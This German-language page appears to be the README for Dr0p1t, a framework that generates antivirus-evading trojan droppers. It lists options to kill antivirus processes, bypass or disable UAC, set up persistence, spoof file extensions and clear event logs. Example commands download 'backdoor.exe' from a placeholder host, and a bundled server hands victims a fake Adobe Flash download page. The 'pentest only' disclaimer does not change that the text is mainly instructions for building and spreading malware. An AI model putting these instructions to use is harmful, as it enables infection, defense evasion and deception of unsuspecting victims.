
Ein Framework, das einen fortschrittlichen tarnenden Dropper erstellt, der die meisten AVs umgeht und viele Tricks hat.
Haben Sie schon einmal von Trojan-Droppern gehört? Kurz gesagt, ein Dropper ist eine Art Malware, die andere Malware herunterlädt. Dr0p1t gibt Ihnen die Möglichkeit, einen unsichtbaren Dropper zu erstellen, der die meisten AVs umgeht und viele Tricks bietet (Vertrauen Sie mir :D ) ;)
+ Eigenschaften der generierten ausführbaren Datei:
+ Framework-Eigenschaften:
+ Module:
+ Persistenzmodule:

Noch nicht vollständig getestet! Wir brauchen Mitwirkende und Tester 😄
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-a Add your link to powershell user profile (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--runas Bypass UAC and run your malware as admin
--spoof Spoof the final file to an extension you choose.
--zip Tell Dr0p1t that the malware in the link is compressed as zip
--upx Use UPX to compress the final file.
--nouac Try to disable UAC on victim device
-i Use icon to the final file. Check icons folder.
--noclearevent Tell the framework to not clear the event logs on target machine after finish.
--nocompile Tell the framework to not compile the final file.
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
Die empfohlene Version für Python 2 ist 2.7.x, die empfohlene Version für Python 3 ist 3.5.x, und verwenden Sie nicht 3.6, da es von PyInstaller noch nicht unterstützt wird.
Hinweis: Sie benötigen Root-Zugriff.
Hier gibt es eine Liste mit allen offiziellen Videos zur Installation und Verwendung von Dr0p1t Playlist
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
Hinweis: In Python 2.7 haben Sie kein pip, installieren Sie es daher zuerst mit dem get-pip.py-Skript [Google it]
Hinweis: Der Server befindet sich noch in der Beta-Version und hat viele Funktionen, die hinzugefügt werden müssen, sowie ein besseres Design [Wir brauchen einen Designer, der beiträgt :D ]
Unter Linux und Windows ist es gleich, nachdem Sie Dr0p1t gemäß den oben genannten Schritten installiert haben, installieren Sie die Module in server_requirements.txt mit pip wie folgt:
python -m pip install -r server_requirements.txt
Jetzt führen wir unser Server-Skript aus:
python Dr0p1t_Server.py
Nach dem Ausführen des Server-Skripts beginnt es, auf alle Verbindungen auf Port 5000 mit Flask zu hören.
Um den Server von Ihrem Gerät aus zu nutzen, öffnen Sie im Browser entweder 127.0.0.1:5000 oder [Ihre IP]:5000.
Um ihn von anderen Geräten im LAN zu öffnen, öffnen Sie [Ihre lokale IP]:5000 und für andere Geräte im WAN öffnen Sie [Ihre globale IP]:5000, stellen Sie jedoch zuerst sicher, dass Sie Ihren Router so konfiguriert haben, dass er Port 5000 an Sie weiterleitet.
Nach dem Öffnen der Serverseite sehen Sie eine einfache Website mit schlichtem Design, die Sie nach den benötigten Daten fragt Siehe Server-Screenshots
Dann übermitteln Sie die Daten, die dann durch einige Prozesse verifiziert werden, dann wird die exe-Datei generiert und Sie werden auf eine Seite weitergeleitet, die Ihnen den Scam-Link angibt.
Nach dem Betreten des Links sehen Sie einen Scam zum Herunterladen des Droppers, der standardmäßig die Adobe Flash Download-Seite ist.
Um den Scam durch Ihren eigenen zu ersetzen, ersetzen Sie den Inhalt der Datei "Scam.html" durch Ihren, aber denken Sie an die Variablen (Entfernen Sie sie nicht).

Weitere für Windows anzeigen Weitere für Linux anzeigen

Wenn dieses Tool für Sie nützlich war, können Sie mir gerne mit einem Kaffee danken :)
Das Dr0p1t-Framework ist nicht verantwortlich für Missbrauch und illegale Zwecke. Verwenden Sie es nur für Pentests oder Bildungszwecke !!!
Das Kopieren von Code aus diesem Framework oder die Verwendung in einem anderen Tool ist erlaubt, solange Sie angeben, woher Sie ihn haben 😄
Pull-Requests sind immer willkommen :D